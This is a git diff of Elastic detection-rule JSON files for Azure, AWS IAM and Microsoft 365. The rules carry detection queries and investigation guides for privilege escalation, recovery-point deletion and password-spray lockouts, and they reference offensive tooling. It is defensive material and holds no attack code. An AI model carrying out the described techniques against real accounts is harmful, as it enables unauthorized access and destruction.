b/packages/security_detection_engine/kibana/security_rule/d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce_1.json new file mode 100644 index 00000000000..3b7103ff036 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce_1.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + 
], + "description": "Identifies multiple Azure Restore Point Collections being deleted by a single user within a short time period. Restore Point Collections contain recovery points for virtual machines, enabling point-in-time recovery capabilities. Mass deletion of these collections is a common tactic used by adversaries during ransomware attacks to prevent victim recovery or to maximize impact during destructive operations. Multiple deletions in rapid succession may indicate malicious intent.", + "false_positives": [ + "Planned decommissioning activities or large-scale infrastructure changes may result in legitimate bulk deletion of Restore Point Collections. Verify with the user and change management processes whether these deletions are authorized. Large-scale migration or cleanup projects should be coordinated and documented to avoid false positives." + ], + "from": "now-9m", + "index": [ + "logs-azure.activitylogs-*", + "filebeat-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Compute Restore Point Collections Deleted", + "note": "## Triage and analysis\n\n### Investigating Azure Compute Restore Point Collections Deleted\n\nAzure Compute Restore Point Collections are essential for disaster recovery, containing snapshots that enable point-in-time recovery\nof virtual machines. The ability to quickly restore VMs from these recovery points is critical for business continuity and\nincident response.\n\nAdversaries conducting ransomware attacks or destructive operations often target backup and recovery infrastructure to\nprevent victims from recovering their systems without paying a ransom. Mass deletion of Restore Point Collections is a\nkey indicator of such activity and represents a significant threat to an organization's resilience.\n\nThis rule detects when a single user deletes multiple Restore Point Collections within a short time window, which is\nunusual in normal operations and highly suspicious when observed.\n\n### Possible investigation steps\n\n- Identify the user account responsible for the deletions by examining the `azure.activitylogs.identity.claims_initiated_by_user.name` or `user.name` field in the alerts.\n- Review all deletion events from this user in the specified time window to determine the scope and scale of the activity.\n- Check the `azure.resource.id` and `azure.resource.name` fields to identify which Restore Point Collections were deleted and assess their criticality to business operations.\n- Verify whether the user account has legitimate administrative access and whether these deletions were authorized through change management or documented maintenance activities.\n- Investigate the timeline of events leading up to the deletions, looking for other suspicious activities such as:\n - Privilege escalation attempts\n - Deletion of other backup resources (Recovery Services vaults, backup policies)\n - Unusual authentication patterns or geographic anomalies\n - Creation of persistence mechanisms or backdoor accounts\n- Review Azure Activity Logs for any failed deletion attempts or access denied events that might indicate reconnaissance activities preceding the successful deletions.\n- Check for related data destruction activities, such as deletion of virtual machines, disks, or storage accounts.\n- Correlate with sign-in logs to identify any unusual login patterns or potential account compromise indicators.\n\n### False positive analysis\n\n- Large-scale decommissioning projects may involve legitimate deletion of multiple 
Restore Point Collections. Verify with change management records and create temporary exceptions during documented maintenance windows.\n- Infrastructure migrations from Azure to another platform or between Azure regions may involve cleanup of old restore points. Confirm these activities are planned and documented before excluding them from monitoring.\n- Automated cleanup scripts designed to manage storage costs by removing old restore points might trigger this alert. Identify the service accounts used for these operations and adjust the threshold or create exceptions as appropriate.\n- Testing and development environments that are frequently rebuilt may see regular bulk deletion of resources. Consider excluding non-production environments or adjusting the threshold for these subscriptions.\n- Review the threshold value (currently set to 3) and adjust based on your environment's baseline if legitimate administrative activities are frequently triggering false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected user account to prevent further malicious activity. Reset credentials and revoke active sessions.\n- Verify the legitimacy of the deletions with the account owner or their manager. If unauthorized, treat this as a confirmed security incident and activate incident response procedures.\n- Check if any of the deleted Restore Point Collections can be recovered through Azure backup services, soft-delete features, or other recovery mechanisms. Time is critical as retention policies may limit recovery windows.\n- Conduct a comprehensive review of all recent activities by the affected user account across the Azure environment to identify other potentially malicious actions or compromised resources.\n- Assess the current disaster recovery posture and identify which VMs are now missing recovery points. 
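For readers less familiar with threshold rules, the sketch below approximates what this rule's threshold configuration (shown further down) does: group successful restore point collection deletions by the initiating user and flag any user who deleted three or more distinct collections within the evaluation window. The event shape and field names are assumptions for illustration only.

```python
# Illustrative approximation of the threshold rule: group successful
# RESTOREPOINTCOLLECTIONS/DELETE events by the initiating user and flag users
# who deleted 3+ distinct restore point collections in the evaluation window.
from collections import defaultdict

DELETE_ACTION = "MICROSOFT.COMPUTE/RESTOREPOINTCOLLECTIONS/DELETE"

def users_exceeding_threshold(events, min_distinct_collections=3):
    """events: iterable of dicts with user, action, outcome, resource_id (hypothetical shape)."""
    deleted = defaultdict(set)
    for e in events:
        if e["action"] == DELETE_ACTION and e["outcome"].lower() == "success":
            deleted[e["user"]].add(e["resource_id"])
    return {user: ids for user, ids in deleted.items()
            if len(ids) >= min_distinct_collections}

# Example (hypothetical events): one user deletes three different collections.
events = [
    {"user": "alice", "action": DELETE_ACTION, "outcome": "Success", "resource_id": f"rpc-{i}"}
    for i in range(3)
]
print(users_exceeding_threshold(events))  # {'alice': {'rpc-0', 'rpc-1', 'rpc-2'}} (set order may vary)
```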
Prioritize creation of new restore points for critical systems if they are unaffected.\n- Review and strengthen access controls for Restore Point Collection management, implementing stricter RBAC policies and requiring multi-factor authentication for privileged operations.\n- If ransomware activity is suspected or confirmed:\n - Activate the organization's ransomware response plan\n - Isolate affected systems to prevent spread\n - Search for ransomware indicators across the environment (encrypted files, ransom notes, suspicious processes)\n - Check for deletion of other recovery resources (Recovery Services vaults, backups, snapshots)\n - Do not pay ransom demands; engage with law enforcement and cybersecurity incident response teams\n- Implement additional monitoring and alerting for related activities such as:\n - Deletion of Recovery Services resources\n - Modifications to backup policies\n - Unusual access to disaster recovery infrastructure\n- Document the incident thoroughly and conduct a post-incident review to identify gaps in security controls and opportunities for improvement.\n- Consider implementing Azure Resource Locks on critical recovery resources to prevent accidental or malicious deletion.\n", + "query": "event.dataset: azure.activitylogs and\n event.action: \"MICROSOFT.COMPUTE/RESTOREPOINTCOLLECTIONS/DELETE\" and\n event.outcome: (Success or success)\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/07/25/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "azure.activitylogs.resource.id", + "value": 3 + } + ], + "field": [ + "azure.activitylogs.identity.claims_initiated_by_user.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 1 + }, + "id": "d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dde13d58-bc39-4aa0-87fd-b4bdbf4591da_7.json b/packages/security_detection_engine/kibana/security_rule/dde13d58-bc39-4aa0-87fd-b4bdbf4591da_7.json new file mode 100644 index 00000000000..9674ba9b1e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dde13d58-bc39-4aa0-87fd-b4bdbf4591da_7.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by attaching additional permissions to compromised 
IAM roles. This rule looks for use of the IAM AttachRolePolicy API operation to attach the highly permissive AdministratorAccess AWS managed policy to an existing IAM role.", + "false_positives": [ + "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `AttachRolePolicy` API operation to attach the `AdministratorAccess` policy to the target role." + ], + "from": "now-6m", + "index": [ + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS IAM AdministratorAccess Policy Attached to Role", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM AdministratorAccess Policy Attached to Role\n\nThe `AdministratorAccess` managed policy grants unrestricted privileges. \nWhen attached to a role, it can enable privilege escalation or persistence, especially if the role is assumable by other accounts or services. \nThis rule detects `AttachRolePolicy` events where the `policyName` is `AdministratorAccess`.\n\n#### Possible investigation steps\n\n- **Identify both identities.** \n Determine the calling user or role (`aws.cloudtrail.user_identity.arn`) and the target role (`aws.cloudtrail.request_parameters.roleName`). \n Validate whether this change aligns with intended administrative actions. \n\n- **Review the target role\u2019s trust policy.** \n Examine who can assume the role (`AssumeRolePolicyDocument`). \n If the role is assumable by external accounts, this may indicate a potential persistence or lateral movement path. \n\n- **Review CloudTrail details.** \n Check `source.ip`, `user_agent.original`, and `source.geo` fields for anomalies. \n Compare with historical operations by the same principal. \n\n- **Correlate with adjacent IAM events.** \n Look for `UpdateAssumeRolePolicy`, `CreateAccessKey`, or `PassRole` calls. \n These often accompany privilege escalation activity. \n\n- **Inspect downstream activity.** \n Query CloudTrail for recent `AssumeRole` calls for the target role \u2014 determine if the newly elevated permissions were used. \n\n### False positive analysis\n\n- **Delegated role management.** \n Cloud administrators may legitimately grant temporary AdministratorAccess for troubleshooting. Confirm through tickets or change logs. \n- **Automation or service-linked roles.** \n Some services attach policies automatically for setup; verify whether the target is a service-linked role. \n\n### Response and remediation\n\n**1. Immediate containment**\n- Detach the policy. Remove the `AdministratorAccess` policy from the target role. \n- Restrict access. Temporarily revoke the caller\u2019s IAM privileges until the legitimacy of the action is confirmed. \n- Audit trust policies. Review the role\u2019s trust relationships to ensure only approved principals can assume it. 
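As a plain restatement of this rule's EQL query (shown further down), the following Python sketch applies the same conditions, including the substring check on the request parameters, to a flattened CloudTrail event. The dictionary shape and the sample event are assumptions for demonstration only.

```python
# Illustrative restatement of the rule's EQL conditions against a flattened
# CloudTrail event (hypothetical dict shape, for demonstration only).

ADMIN_POLICY_ARN = "policyArn=arn:aws:iam::aws:policy/AdministratorAccess"

def matches_admin_policy_attachment(event: dict) -> bool:
    return (
        event.get("event.dataset") == "aws.cloudtrail"
        and event.get("event.provider") == "iam.amazonaws.com"
        and event.get("event.action") == "AttachRolePolicy"
        and event.get("event.outcome") == "success"
        and ADMIN_POLICY_ARN in event.get("aws.cloudtrail.request_parameters", "")
    )

# Example (hypothetical event):
sample = {
    "event.dataset": "aws.cloudtrail",
    "event.provider": "iam.amazonaws.com",
    "event.action": "AttachRolePolicy",
    "event.outcome": "success",
    "aws.cloudtrail.request_parameters": (
        "{roleName=app-role, policyArn=arn:aws:iam::aws:policy/AdministratorAccess}"
    ),
}
assert matches_admin_policy_attachment(sample)
```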
\n- Rotate credentials for any principals who assumed the affected role during the period of elevated privileges. \n\n**2. Evidence preservation**\n- Export the triggering `AttachRolePolicy` event and related CloudTrail entries \u00b130 minutes from the alert. \n- Preserve AWS Config snapshots and GuardDuty findings for traceability. \n\n**3. Scoping and investigation**\n- Identify if the elevated role was subsequently assumed. \n Correlate by matching `aws.cloudtrail.eventName:AssumeRole` with the target role ARN. \n- Search for other recent IAM policy attachments or modifications by the same actor or IP. \n\n**4. Recovery and hardening**\n- Apply least privilege policies; limit who can attach or modify administrative policies. \n- Enforce IAM Conditions such as `aws:PrincipalArn` or `aws:ResourceTag` to limit policy attachment scope. \n- Enable CloudTrail, GuardDuty, and Security Hub across all regions. \n- Implement SCPs at the organization level to restrict direct `AdministratorAccess` attachments. \n\n### Additional information\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/): response steps related to IAM policy modification and unauthorized privilege escalation.. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/): for containment, analysis, and recovery guidance.\n- **AWS Documentation:** [AdministratorAccess Policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_job-functions.html#jf_administrator). \n", + "query": "iam where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"AttachRolePolicy\"\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"policyArn=arn:aws:iam::aws:policy/AdministratorAccess\")\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachRolePolicy.html", + "https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AdministratorAccess.html", + "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "dde13d58-bc39-4aa0-87fd-b4bdbf4591da", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + }, + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "dde13d58-bc39-4aa0-87fd-b4bdbf4591da_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_1.json deleted file mode 100644 index 00c111e88de..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_1.json +++ /dev/null @@ -1,56 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Microsoft 365 User Account Lockouts in Short Time Window", - "note": "## Triage and Analysis\n\n### Investigating Multiple Microsoft 365 User Account Lockouts in Short Time Window\n\nDetects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts.\n\nThis rule uses ES|QL aggregations and thus has dynamically generated fields. Correlation of the values in the alert document may need to be performed to the original sign-in and Graph events for further context.\n\n### Investigation Steps\n\n- Review the `user_id_list`: Are specific naming patterns targeted (e.g., admin, helpdesk)?\n- Examine `ip_list` and `source_orgs`: Look for suspicious ISPs or hosting providers.\n- Check `duration_seconds`: A very short window with a high lockout rate often indicates automation.\n- Confirm lockout policy thresholds with IAM or Entra ID admins. 
Did the policy trigger correctly?\n- Use the `first_seen` and `last_seen` values to pivot into related authentication or audit logs.\n- Correlate with any recent detection of password spraying or credential stuffing activity.\n- Review the `request_type` field to identify which authentication methods were used (e.g., OAuth, SAML, etc.).\n- Check for any successful logins from the same IP or ASN after the lockouts.\n\n### False Positive Analysis\n\n- Automated systems with stale credentials may cause repeated failed logins.\n- Legitimate bulk provisioning or scripted tests could unintentionally cause account lockouts.\n- Red team exercises or penetration tests may resemble the same lockout pattern.\n- Some organizations may have a high volume of lockouts due to user behavior or legacy systems.\n\n### Response Recommendations\n\n- Notify affected users and confirm whether activity was expected or suspicious.\n- Lock or reset credentials for impacted accounts.\n- Block the source IP(s) or ASN temporarily using conditional access or firewall rules.\n- Strengthen lockout and retry delay policies if necessary.\n- Review the originating application(s) involved via `request_types`.\n", - "query": "FROM logs-o365.audit-*\n\n| MV_EXPAND event.category\n| EVAL\n time_window = DATE_TRUNC(5 minutes, @timestamp),\n user_id = TO_LOWER(o365.audit.UserId),\n ip = source.ip,\n login_error = o365.audit.LogonError,\n request_type = TO_LOWER(o365.audit.ExtendedProperties.RequestType),\n asn_org = source.`as`.organization.name,\n country = source.geo.country_name,\n event_time = @timestamp\n\n| WHERE event.dataset == \"o365.audit\"\n AND event.category == \"authentication\"\n AND event.provider IN (\"AzureActiveDirectory\", \"Exchange\")\n AND event.action IN (\"UserLoginFailed\", \"PasswordLogonInitialAuthUsingPassword\")\n AND request_type RLIKE \"(oauth.*||.*login.*)\"\n AND login_error == \"IdsLocked\"\n AND user_id != \"not available\"\n AND o365.audit.Target.Type IN (\"0\", \"2\", \"6\", \"10\")\n AND asn_org != \"MICROSOFT-CORP-MSN-AS-BLOCK\"\n\n| STATS\n unique_users = COUNT_DISTINCT(user_id),\n user_id_list = VALUES(user_id),\n ip_list = VALUES(ip),\n unique_ips = COUNT_DISTINCT(ip),\n source_orgs = VALUES(asn_org),\n countries = VALUES(country),\n unique_country_count = COUNT_DISTINCT(country),\n unique_asn_orgs = COUNT_DISTINCT(asn_org),\n request_types = VALUES(request_type),\n first_seen = MIN(event_time),\n last_seen = MAX(event_time),\n total_lockout_responses = COUNT()\n BY time_window\n\n| EVAL\n duration_seconds = DATE_DIFF(\"seconds\", first_seen, last_seen)\n\n| KEEP\n time_window, unique_users, user_id_list, ip_list,\n unique_ips, source_orgs, countries, unique_country_count,\n unique_asn_orgs, request_types, first_seen, last_seen,\n total_lockout_responses, duration_seconds\n\n| WHERE\n unique_users >= 10 AND\n total_lockout_responses >= 10 AND\n duration_seconds <= 300\n", - "references": [ - "https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray", - "https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties", - "https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/", - "https://github.com/0xZDH/Omnispray", - "https://github.com/0xZDH/o365spray" - ], - "risk_score": 47, - "rule_id": "de67f85e-2d43-11f0-b8c9-f661ea17fbcc", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: 
Threat Detection", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "de67f85e-2d43-11f0-b8c9-f661ea17fbcc_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_4.json b/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_4.json index 8288c891ff8..3053988217d 100644 --- a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_4.json +++ b/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_4.json @@ -18,6 +18,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 47, "rule_id": "de67f85e-2d43-11f0-b8c9-f661ea17fbcc", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_103.json b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_103.json deleted file mode 100644 index e25780c619d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_103.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Account Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Automation Account Created\n\nAzure Automation accounts facilitate the automation of management tasks and orchestration across cloud environments, enhancing operational efficiency. However, adversaries may exploit these accounts to establish persistence by automating malicious activities. 
The detection rule monitors the creation of these accounts by analyzing specific Azure activity logs, focusing on successful operations, to identify potential unauthorized or suspicious account creations.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the creation of the Automation account by checking for the operation name \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE\" and ensure the event outcome is marked as Success.\n- Identify the user or service principal that initiated the creation of the Automation account by examining the associated user identity information in the activity logs.\n- Investigate the context of the Automation account creation by reviewing recent activities performed by the identified user or service principal to determine if there are any other suspicious or unauthorized actions.\n- Check the configuration and permissions of the newly created Automation account to ensure it does not have excessive privileges that could be exploited for persistence or lateral movement.\n- Correlate the Automation account creation event with other security alerts or logs to identify any patterns or indicators of compromise that may suggest malicious intent.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger the rule when legitimate users create Azure Automation accounts for operational purposes. To manage this, maintain a list of authorized personnel and their expected activities, and cross-reference alerts with this list.\n- Automated deployment scripts or infrastructure-as-code tools might create automation accounts as part of their normal operation. Identify these scripts and exclude their associated activities from triggering alerts by using specific identifiers or tags.\n- Scheduled maintenance or updates by cloud service providers could result in the creation of automation accounts. Verify the timing and context of the account creation against known maintenance schedules and exclude these from alerts if they match.\n- Development and testing environments often involve frequent creation and deletion of resources, including automation accounts. 
Implement separate monitoring rules or environments for these non-production areas to reduce noise in alerts.\n\n### Response and remediation\n\n- Immediately review the Azure activity logs to confirm the creation of the Automation account and identify the user or service principal responsible for the action.\n- Disable the newly created Azure Automation account to prevent any potential malicious automation tasks from executing.\n- Conduct a thorough investigation of the user or service principal that created the account to determine if their credentials have been compromised or if they have acted maliciously.\n- Reset credentials and enforce multi-factor authentication for the identified user or service principal to prevent unauthorized access.\n- Review and adjust Azure role-based access control (RBAC) policies to ensure that only authorized personnel have the ability to create Automation accounts.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems or accounts have been compromised.\n- Implement enhanced monitoring and alerting for future Automation account creations to quickly detect and respond to similar threats.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE\" and event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", - "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "df26fd74-1baa-4479-b42e-48da84642330", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "df26fd74-1baa-4479-b42e-48da84642330_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df919b5e-a0f6-4fd8-8598-e3ce79299e3b_7.json b/packages/security_detection_engine/kibana/security_rule/df919b5e-a0f6-4fd8-8598-e3ce79299e3b_7.json new file mode 100644 index 00000000000..eb1ee38cc00 --- 
/dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df919b5e-a0f6-4fd8-8598-e3ce79299e3b_7.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by attaching additional permissions to user groups the compromised user account belongs to. This rule looks for use of the IAM AttachGroupPolicy API operation to attach the highly permissive AdministratorAccess AWS managed policy to an existing IAM user group.", + "false_positives": [ + "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `AttachGroupPolicy` API operation to attach the `AdministratorAccess` policy to the user group." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "group.name", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS IAM AdministratorAccess Policy Attached to Group", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM AdministratorAccess Policy Attached to Group\n\nThe AWS-managed `AdministratorAccess` policy grants full administrative privileges across all AWS services. \nWhen attached to a group, all group members inherit this access, often unintentionally broadening the blast radius of a compromise. \nAdversaries can exploit `iam:AttachGroupPolicy` permissions to escalate privileges or establish persistence by attaching this policy to an existing user group.\n\n#### Possible investigation steps\n\n- **Identify the affected group and calling principal.** \n Review `aws.cloudtrail.user_identity.arn` (caller) and `aws.cloudtrail.request_parameters.groupName` (target group). \n Validate whether this aligns with legitimate change management or automation workflows. \n\n- **Review group membership.** \n Enumerate current members using `aws iam get-group`. \n Determine whether unauthorized users could have gained administrative access as a result. \n\n- **Inspect CloudTrail details.** \n Check `source.ip`, `user_agent.original`, and `source.geo` fields for anomalies. \n Compare with historical operations by the same principal. \n\n- **Correlate related IAM activity.** \n Search for adjacent events such as `AddUserToGroup`, `CreateUser`, or `AttachUserPolicy`. \n These may indicate chained privilege escalation. \n\n- **Assess propagation of privileges.** \n If the group has many members or is linked to cross-account roles, the impact may extend beyond a single user. \n Document all affected identities for containment. \n\n### False positive analysis\n\n- **Intentional access updates.** \n Policy attachment may occur during legitimate administrative provisioning. Confirm via ticketing systems. 
